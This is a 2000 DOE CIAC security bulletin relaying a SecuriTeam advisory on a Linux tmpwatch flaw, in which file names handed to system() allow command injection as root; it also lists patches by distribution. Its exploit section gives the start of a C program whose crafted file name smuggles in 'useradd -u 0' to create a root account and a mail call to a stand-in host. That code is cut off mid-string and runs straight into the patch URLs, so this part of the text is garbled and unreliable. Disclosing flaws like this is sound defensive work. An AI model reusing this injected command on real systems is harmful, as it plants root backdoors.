__________________________________________________________ The U.S. Department of Energy Computer Incident Advisory Capability ___ __ __ _ ___ / | /_\ / \___ __|__ / \ \___ __________________________________________________________ INFORMATION BULLETIN Linux 'tmpwatch' Vulnerability October 16, 2000 16:00 GMT Number L-005 ______________________________________________________________________________ PROBLEM: The tmpwatch utility has a flaw in the execution of the system() library subroutine. PLATFORM: Red Hat Linux 7.0 (tmpwatch v2.5.1) Red Hat Linux 6.2 (tmpwatch v2.2) Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0 prg gráficos, ecommerce 5.1 Trustix Secure Linux Mandrake 6.0, 6.1, 7.0, 7.1 Immunix OS 6.2 DAMAGE: Through the use of arbitrary commands to the system() library a local user account could gain root. By creating layers of subdirectories in a subdirectory monitored by tmpwatch, a local user could fill the system process table. This would cause a denial of service to the system requiring a hard reboot. SOLUTION: Apply the patches specified in the advisory ______________________________________________________________________________ VULNERABILITY The risk is MEDIUM. The advisory has been publicly discussed, ASSESSMENT: with exploit code given. ______________________________________________________________________________ [****** Begin SecuriTeam Advisory ******] Insecure call of external programs in tmpwatch ------------------------------------------------------------------------ SUMMARY The tmpwatch utility is used in Red Hat Linux to remove temporary files. This utility has an option to call the "fuser" program, which verifies if a file is currently opened by a process. The fuser program is invoked within tmpwatch by calling the system() library subroutine. Insecure handling of the arguments to this subroutine could potentially allow an attacker to execute arbitrary commands. DETAILS Affected Versions: Red Hat Linux 7.0 (tmpwatch v2.5.1) Red Hat Linux 6.2 (tmpwatch v2.2) Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos, ecommerce, 5.1 Trustix Secure Linux Mandrake 6.0, 6.1, 7.0, 7.1 Immunix OS 6.2 Immune Versions: SuSE Impact: This vulnerability may allow local attackers to compromise superuser access if the administrator in a non-default manner uses tmpwatch. The tmpwatch tool removes files that have not been modified or accessed within a specified amount of time. It was designed to securely remove files by avoiding typical race condition vulnerabilities. System administrators usually run this tool periodically to remove old temporary files in world-writeable directories. The tmpwatch tool uses the --fuser or -s options to avoid removing a file that is in an open state in another process. This option uses the system() library subroutine to call the external program /sbin/fuser with the file name being examined as an argument. The system() subroutine spawns a shell to execute the command. An attacker may create a file name containing shell metacharacters, which could allow them to execute arbitrary commands if tmpwatch with the fuser option is used to remove the file. Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch packages suggests this vulnerability was recognized and a fix was attempted. However, the fix is incorrect, and the vulnerability is still exploitable. Exploit: 1. Compile and run: #include int main() { FILE *f; char filename[100] = ";useradd -u 0 -g 0 haks0r;mail haks0r@somehost.com ftp://updates.redhat.com/6.2/alpha/tmpwatch-2.6.2-1.6.2.alpha.rpm Sparc: ftp://updates.redhat.com/6.2/sparc/tmpwatch-2.6.2-1.6.2.sparc.rpm i386: ftp://updates.redhat.com/6.2/i386/tmpwatch-2.6.2-1.6.2.i386.rpm Sources: ftp://updates.redhat.com/6.2/SRPMS/tmpwatch-2.6.2-1.6.2.src.rpm Red Hat Linux 7.0: i386: ftp://updates.redhat.com/7.0/i386/tmpwatch-2.6.2-1.7.i386.rpm Sources: ftp://updates.redhat.com/7.0/SRPMS/tmpwatch-2.6.2-1.7.src.rpm Conectiva: ftp://atualizacoes.conectiva.com.br/4.0/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/4.0es/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/4.1/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/4.2/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/5.0/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/5.1/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/tmpwatch-2.6.2-1cl.src.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tmpwatch-2.6.2-1cl.i386.rpm ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/tmpwatch-2.6.2-1cl.src.rpm Trustix Secure Linux: This file can be found at: http://www.trustix.net/download/Trustix/updates/1.1/RPMS/ Or ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/ Mandrake: You can download the updates directly from: ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates Linux-Mandrake 6.0: 6.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 6.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Linux-Mandrake 6.1: 6.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 6.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Linux-Mandrake 7.0: 7.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 7.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Linux-Mandrake 7.1: 7.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm 7.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm Immunix OS 6.2: http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/tmpwatch-2.6.2-1.6.2_StackGuard.i386.rpm Or http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/tmpwatch-2.6.2-1.6.2_StackGuard.src.rpm ADDITIONAL INFORMATION The information has been provided by X-Force, Alexander Y. Yurchenko, TSL Team, Roman Drahtmueller, Linux Mandrake Security Team, and Greg KH. ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. [****** End SecuriTeam Advisory ******] _______________________________________________________________________________ CIAC wishes to acknowledge the contributions of Beyond-Security's SecuriTeam for the information contained in this bulletin. _______________________________________________________________________________ CIAC, the Computer Incident Advisory Capability, is the computer security incident response team for the U.S. Department of Energy (DOE) and the emergency backup response team for the National Institutes of Health (NIH). CIAC is located at the Lawrence Livermore National Laboratory in Livermore, California. CIAC is also a founding member of FIRST, the Forum of Incident Response and Security Teams, a global organization established to foster cooperation and coordination among computer security teams worldwide. CIAC services are available to DOE, DOE contractors, and the NIH. CIAC can be contacted at: Voice: +1 925-422-8193 FAX: +1 925-423-8002 STU-III: +1 925-423-2604 E-mail: ciac@llnl.gov For emergencies and off-hour assistance, DOE, DOE contractor sites, and the NIH may contact CIAC 24-hours a day. During off hours (5PM - 8AM PST), use one of the following methods to contact CIAC: 1. Call the CIAC voice number 925-422-8193 and leave a message, or 2. Call 888-449-8369 to send a Sky Page to the CIAC duty person or 3. Send e-mail to 4498369@skytel.com, or 4. Call 800-201-9288 for the CIAC Project Leader. Previous CIAC notices, anti-virus software, and other information are available from the CIAC Computer Security Archive. World Wide Web: http://www.ciac.org/ (or http://ciac.llnl.gov -- they're the same machine) Anonymous FTP: ftp.ciac.org (or ciac.llnl.gov -- they're the same machine) Modem access: +1 (925) 423-4753 (28.8K baud) +1 (925) 423-3331 (28.8K baud) PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing communities receive CIAC bulletins. If you are not part of these communities, please contact your agency's response team to report incidents. Your agency's team will coordinate with CIAC. The Forum of Incident Response and Security Teams (FIRST) is a world-wide organization. A list of FIRST member organizations and their constituencies can be obtained via WWW at http://www.first.org/. This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes. LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC) K-068: Automated Web Interface Scans IIS for Multiple Vulnerabilities K-069: Input Validation Problem in rpc.statd K-070: PGP Additional Decryption Keys ADKs Vulnerability K-071: cisco.ciscosecure.acs.vulnerability.txt K-072: trinity.stacheldraht.variants.txt* K-073: vulnerabilities.firewall.1.txt* L-001: Linux/BSD initialized data overflow in Xlock L-002: Cisco Secure PIX Firewall Mailguard Vulnerability L-003: FreeBSD TCP Sequence Number Vulnerability L-004: FreeBSD LPRng Vulnerability